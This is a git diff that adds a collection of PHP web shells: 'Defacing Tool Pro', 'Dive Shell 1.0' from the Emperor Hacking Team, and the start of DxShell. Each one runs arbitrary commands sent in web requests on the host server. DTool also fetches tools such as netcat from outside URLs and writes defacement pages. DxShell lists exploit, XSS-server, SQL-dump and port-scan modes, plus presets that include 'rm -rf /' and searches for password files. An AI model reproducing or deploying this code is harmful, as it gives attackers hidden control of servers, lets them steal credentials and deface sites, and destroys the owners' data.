+          <TD class=calendar_day><font color="#FF0000">12 </font> </TD>
+          <TD class=calendar_day>13</TD><TD class=calendar_day>14 </TD>
+          <TD class=calendar_day>15 </TD></TR>
+        <TR>
+          <TD class=calendar_day><font color="#FF0000">16 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">17 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">18</font></TD><TD class=calendar_day>19</TD><TD class=calendar_day>20 </TD>
+          <TD class=calendar_day>21 </TD>
+          <TD class=calendar_current_day>22 </TD></TR>
+        <TR>
+          <TD class=calendar_day>23</TD><TD class=calendar_day>24</TD><TD class=calendar_day>25</TD><TD class=calendar_day>26</TD><TD class=calendar_day><font color="#FF0000">27</font></TD><TD class=calendar_day><font color="#FF0000">28</font></TD><TD class=calendar_day><font color="#FF0000">29</font></TD></TR><TR>
+          <TD class=calendar_day>30</TD><TD class=calendar_day>31</TD><TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR></TBODY></TABLE></TD></TR>
+  </TBODY></TABLE>
+
+        </div>
+
+
+</body></html>
diff --git a/xakep-shells/PHP/DTool Pro.php.txt b/xakep-shells/PHP/DTool Pro.php.txt
new file mode 100644
index 0000000..0799e5e
--- /dev/null
+++ b/xakep-shells/PHP/DTool Pro.php.txt	
@@ -0,0 +1,198 @@
+<?php
+
+if(empty($chdir)) $chdir = @$_GET['chdir'];
+if(empty($cmd)) $cmd = @$_GET['cmd'];
+if(empty($fu)) $fu = @$_GET['fu'];
+if(empty($list)) $list = @$_GET['list'];
+
+if(empty($chdir) or $chdir=='') $chdir=getcwd();
+$cmd = stripslashes(trim($cmd));
+
+
+//CHDIR tool
+if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
+	$boom = explode(" ",$cmd,2);
+	$boom2 = explode(";",$boom['1'], 2);
+	$toDir = $boom2['0'];
+
+	if($boom['1']=="/")$chdir="";
+	else if(strpos($cmd, 'chdir ..')!==false){
+		$cadaDir = array_reverse(explode("/",$chdir));
+
+		if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
+		else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
+		$toDir = str_replace($lastDir,"",$chdir);
+		if($toDir=="/")$chdir="";
+	}
+	else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
+	else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
+
+	if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
+	if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
+	else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
+	else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
+	if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
+	if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+}
+if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
+$cmdShow = $cmd;
+
+//To keep the changes in the url, when using the 'GET' way to send php variables
+if(empty($post)){
+	if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
+	if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
+	if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
+}
+
+//INFO table (pro and normal)
+if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
+if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
+if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
+if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
+if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
+if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
+$safe = @ini_get($safemode);
+if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
+$pro8 = "<i>PHP </i>".phpversion();
+$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
+$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
+$ip=@gethostbyname($_SERVER['HTTP_HOST']);
+
+//Turns the 'ls' command more usefull, showing it as it looks in the shell
+if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
+else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
+else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
+else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
+else if($cmd=='ls') $cmd = "ls -F";
+
+//If there are some '//' in the cmd, its now removed
+if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+?>
+<body onload="focar();">
+<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
+.infop{font-family: verdana; font-size: 10px; color:#000000;}
+.infod{font-family: verdana; font-size: 10px; color:#414978;}
+.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
+.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
+<script>
+function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
+function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
+function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
+function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
+function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
+function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
+function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
+function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
+function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
+function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
+</script>
+<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
+<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
+<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
+</b></div></td></tr>
+<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
+<?php
+ $uname = @posix_uname();
+ while (list($info, $value) = each ($uname)) { ?>
+<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
+<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
+<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
+<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
+<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
+<? if($chdir!=getcwd()){?>
+<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
+<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
+</DIV></TD></TR></TABLE></td></tr>
+<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
+<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
+<td width="75"><DIV class="algod">command</DIV></td>
+<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
+<script>
+function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
+</script>
+</td></tr></table><table><tr><td>
+<?php
+ob_start();
+if(isset($chdir)) @chdir($chdir);
+function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
+function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
+function shell($what){echo(shell_exec($what));}
+function popenn($what){
+	$handle=popen("$what", "r");
+	$out=@fread($handle, 2096);
+	echo $out;
+	@pclose($handle);
+}
+function execc($what){
+	exec("$what",$array_out);
+	$out=implode("\n",$array_out);
+	echo $out;
+}
+function procc($what){
+	//na sequencia: stdin, stdout, sterr
+	if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
+	$process = @proc_open("$what",$descpec,$pipes);
+	if (is_resource($process)) {
+		fwrite($pipes[0], "");
+		fclose($pipes[0]);
+
+		while(!feof($pipes[2])) {
+			$erro_retorno = fgets($pipes[2], 4096);
+			if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
+		}
+    		fclose($pipes[2]);
+
+		while(!feof($pipes[1])) {
+			echo fgets($pipes[1], 4096);
+		}
+		fclose($pipes[1]);
+
+		$ok_p_fecha = @proc_close($process);
+	}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
+}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
+}
+
+$funE="function_exists";
+if($safe){$fe="safemode";$feshow=$fe;}
+elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
+elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
+elseif($funE('system')){$fe="system";$feshow=$fe;}
+elseif($funE('exec')){$fe="execc";$feshow="exec";}
+elseif($funE('popen')){$fe="popenn";$feshow="popen";}
+elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
+else {$fe="nofunction";$feshow=$fe;}
+if($fu!="0" or !empty($fu)){
+  if($fu==1){$fe="passthru";$feshow=$fe;}
+  if($fu==2){$fe="system";$feshow=$fe;}
+  if($fu==3){$fe="execc";$feshow="exec";}
+  if($fu==4){$fe="popenn";$feshow="popen";}
+  if($fu==5){$fe="shell";$feshow="shell_exec";}
+  if($fu==6){$fe="procc";$feshow="proc_open";}
+}
+$fe("$cmd 2>&1");
+$output=ob_get_contents();ob_end_clean();
+?>
+<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
+<option><?="using $feshow()";?>
+<option value="1">use passthru()
+<option value="2">use system()
+<option value="3">use exec()
+<option value="4">use popen()
+<option value="5">use shell_exec()
+<option value="6">use proc_open()*new
+<option value="0">auto detect (default)
+</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
+<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
+</tr></table></td></tr></table></form></td></tr>
+<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
+<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
+<?php
+echo $ch_msg;
+if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
+if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
+?></TEXTAREA><BR></td></tr>
+<?php
+if($list=="1") @include($remote_addr."flist".$format_addr);
+?>
+</table>
+
diff --git a/xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt b/xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt
new file mode 100644
index 0000000..9c6d47e
--- /dev/null
+++ b/xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt	
@@ -0,0 +1,187 @@
+<?php
+
+/*Emperor Hacking TEAM */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>Dive Shell - Emperor Hacking Team</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #FFFFFF">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
+</font></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
+<div style="width: 989; height: 456">
+  <p align="center"><b>
+  <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
+  <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
+  </font>
+  &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea> </p>
+<p class="prompt" align="center">
+  <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b> 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
+<p class="prompt" align="center">
+  <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
+<p class="prompt" align="center">
+  <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
+&nbsp;</font></p>
+</div>
+</form>
+
+
+<p class="prompt" align="center">
+  <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
+  </b></p>
+
+
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Dx.php.php.txt b/xakep-shells/PHP/Dx.php.php.txt
new file mode 100644
index 0000000..ebca7b5
--- /dev/null
+++ b/xakep-shells/PHP/Dx.php.php.txt
@@ -0,0 +1,2026 @@
+<?php
+
+/*
+  DDDDD        SSSSS    DxShell    by �_� Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ#244648
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0b'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
